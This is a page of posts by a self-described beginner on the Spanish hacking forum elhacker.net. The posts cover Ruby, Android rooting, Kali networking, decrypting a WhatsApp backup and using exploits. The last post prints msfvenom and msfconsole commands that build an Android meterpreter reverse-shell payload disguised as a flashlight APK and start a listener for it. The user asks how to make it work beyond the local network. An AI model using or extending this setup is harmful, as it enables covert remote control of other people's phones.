elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Arreglado, de nuevo, el registro del warzone (wargame) de EHN


  Mostrar Temas
Páginas: 1 2 [3]
21  Foros Generales / Sugerencias y dudas sobre el Foro / ¿Qué es la etiqueta GeShi y cómo la utilizo? en: 23 Junio 2016, 03:53 am
Buenas a todos. seré breve y rapido.
Por lo que he podido ver en algun post, la administración pide que se utilice el codigo GeShi correctamente...

El caso es, que yo no tengo ni pajolera idea de qué es eso; y no quiero cagarla mucho.

gracias por responder gente.
22  Programación / Programación General / [Resuelto] ¿Por que este código de ruby congela Kali Linux completamente? en: 23 Junio 2016, 03:14 am
Buenas a todos. Antes de comenzar (Por si desvarío un poco) cabe destacar que comencé mi primera guía de Ruby hace 4 días literalmente; y es mi primer lenguaje de programación; con lo que todavía soy demasiado noob. (Tiempo al tiempo....)

El caso; he estado siguiendo unas practicas; y yo.. que soy muy curioso; he querido probar cosas por mi cuenta.. he creado un código muy muy muy básico (No sabria crear nada mas) en el que una parte de él, creaba una matriz vacía, y seguídamente hacía un while con la condición de que si dentro de la matriz no está X objeto (En este caso 0 ), en la misma matriz se le añadirá un objeto (En este caso 1) esto por lo que entiendo hace que se cree un bucle infinito añadiendo ese mismo objeto todo el rato.

El código no era sólo eso; pero me di cuenta que al llegar a ese paso; el ordenador se me CONGELABA y no me dejaba hacer nada. (incluso entrar a modo comandas con CTRL + ALT + F1) . He intentado lanzar ese código 3 veces y las 3; he tenido que apagar el equipo de manera forzada.

Al ver que me pasaba eso; he intentado sacar esa parte del código y hacerla más simple. He querido comprobar si DE VERDAD ese código congela mi ordenador; y sí, lo hace cada vez que lo inicio.

Me gustaría que alguien más probase el código y me diga si le ocurre lo mismo. También; si alguien (Que seguro que alguien habrá) Sabe por qué pasa esto; me gustaría que me lo explicase, para así, poder entenderlo todo bien.

PD: Si no se os congela cuando lancéis el codigo; intentad usar un poco vuestro equipo (Entrar a alguna carpeta, abrir navegador..)

Citar
x = []
while x != '0'
x.push '1'
end
puts 'si el texto sale; algo ha ido mal'


PD2: ¿Es correcto usar la terminación 'Lanzar' para ejecutar un archivo ruby? en caso contrario; como se diría correctamente?.
Gracias!
23  Comunicaciones / Android / ¿Puedo comenzar a trastear android con un movil sin tactil? en: 22 Junio 2016, 23:13 pm
Buenas a todos. Estoy comenzando en esto de la "Seguridad informática". Nunca he toqueteado con android y creo que es algo que hoy en día hay que aprenderlo; ya que android es un sistema operativo el cual esta bastante en uso actualmente.
El caso es que; por lo que tengo entendido, al rootear un movil; formatearlo.. etc, puedes cargartelo. Y yo no dispongo de recursos suficientes como para conseguir un móvil rapidamente si se me rompe este.

El caso es; Tengo un móvil bastante bueno, pero el cual se me cayó; y se jodió el táctil por dentro (Mitad de la pantalla hace click; otra mitad no) Aunque no se puede iniciar de ninguna manera por que no puedes entrar el pin de desbloqueo completo. Me gustaría saber si, con el movil pero su tactil in-accesible; podría hacer algo en él para comenzar a aprender..
No sé. Formatearlo; cosas así.. que vaya cogiendo algo de experiencia inicial.. recordad que no tengo nada de experiencia con android.

un dato; me urge un poco aprender a cambiar la ROM del móvil, ya que compré un lenovo chino; y tiene adware de fábrica; y como se espera, un "Restaurar de Fábrica" no hace nada.

Gracias! Acepto cualquier tipo de opinión.

PD: No sé bien bien si he puesto el tema en la sección indicada. veo más lógico que este en esta sección que en hacking mobile; no obstante, si me equivoco que un admin haga lo que tenga que hacer! :D
24  Programación / Programación General / ¿Cón que lenguaje de programación comienzo? No sé ninguno. en: 21 Junio 2016, 11:03 am
Buenas a todos. Estoy intentando meterme en esto de la seguridad informática; y he comenzado trasteando un poco con exploits y demás.. el caso es que no sé NINGUN lenguaje de programación; y estoy buscando un poco de ayuda para planificar antes de comenzar a dar ningun paso importante.

Me gustaría que alguien me resolviera algunas dudas; como..

¿Cómo aprendo un lenguaje de programación por mi cuenta sin un curso?
¿Por donde comienzo?
¿Cómo lo hago?
¿Tengo que aprender algo más antes de adentrarme en cualquier lenguaje de programación?

No obstante; me he informado que el lenguaje de programacion que utiliza exploit es cuby (No sé si esa información es real o no..) y he comenzado a buscar algo de cuby por internet. He encontrado una guía muy buena (Porcierto, la dejaré al final del post) en la cual te enseña más o menos cuby; y he comenzado a leermela un poco.. pero no le quiero dar caña de verdad hasta saber si estaría bien comenzar por ese.. o busco otro.. o qué hago.

Muchas gracias por leer el post y dedicar tu tiempo; espero respuestas!

os dejo el link de la guía, aconsejo echarle un vistazo!
http://rubysur.org/aprende.a.programar/index.html
25  Sistemas Operativos / GNU/Linux / DUDA: Cómo desconectarse de una red inalambrica mediante comando. en: 20 Junio 2016, 16:53 pm
Buenas, mi pregunta será breve y precisa.
¿Cómo me desconecto de la red que estoy usando en la interfaz wlan0 mediante comando?

PD: Uso kali linux.

PD2: ¿Dónde está la opción gráfica en kali linux de desconectarte a la red inalambricca que estas
utilizando?
PD3: ¿Puede ser que mi menú grafico de red este algo bugeado?
26  Seguridad Informática / Bugs y Exploits / ¿Algun exploit para ser ejecutado directamente desde el ordenador atacante? en: 19 Junio 2016, 23:12 pm
Hola. llevo dias comenzando a introducirme en esto de los exploits. y bueno; he podido lanzar alguno; pero me he quedado un poco insatisfecho ya que siempre tengo que ejecutar algo desde el ordenador victima. he probado a seguir cursos pero cuando hago el nmap a mis ordenadores victima (Windows7, y Windows8.1) le encuentro muy pocos puertos abiertos; y los pocos que encuentro, no encuentro informacion sobre algun exploit relacionado..
Me gustaría encontrar alguna manera de poder apreder a crear exploits remotamente. Si alguien tiene algo o sabe algo que me ayudase, agradeceria que lo comente. gracias
27  Seguridad Informática / Seguridad / DUDA: descifrar copia de seguridad whatsapp (.crypt12) en: 16 Junio 2016, 17:41 pm
Muy buenas a todos. He estado investigando un poco por internet como descifrar una copia de seguridad de mensajes de whatsapp, y no he podido encontrar la respuesta.
He podido infectarme el movil con un Exploit y descargarme mi copia de seguridad, no obstante, no encuentro manera ninguna de descifrar y poder llegar a mis mensajes.
No necesito ver mis mensajes, es una cuestion de aprender mas sobre la informatica.

agradeceria si alguien sabe alguna manera.

EXTRA: Posiblemente alguna manera que se pueda hacer desde Linux.
28  Seguridad Informática / Bugs y Exploits / DUDA: Colocar IP Publica en exploit de reverse_tcp (MSFVENOM) en: 16 Junio 2016, 17:36 pm
Hola a todos. Como he dicho en otro tema, y vuelvo a repetir  :rolleyes: estoy comenzando en esto de la seguridad informatica y soy muy principiante.  el caso es que he estado probando por primeravez esto de los exploits, y me ha surgido una duda. He estado probando un exploit y hay que colocar una IP y un PUERTO. La ayuda que he visto en internet, indica que colocan la IP local, no obstante, me surgio la duda, busque por internet, y me parecio leer que con la IP Publica tambien funciona, y asi puedes ejecutar el exploit en un dispositivo que no este en tu red local.
No obstante, he estado probando y no me ha funcionado. Me gustaria que alguien me respondiese si esto es posible, y tanto si lo es como si no, el por que (Nunca olvidemos que la base es el aprendizaje)

Os dejo los comandos del exploit para que me podais ayudar con mas facilidad. gracias.

Citar
msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 R > /root/linterna.apk

msfconsole

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.110
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit
Páginas: 1 2 [3]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines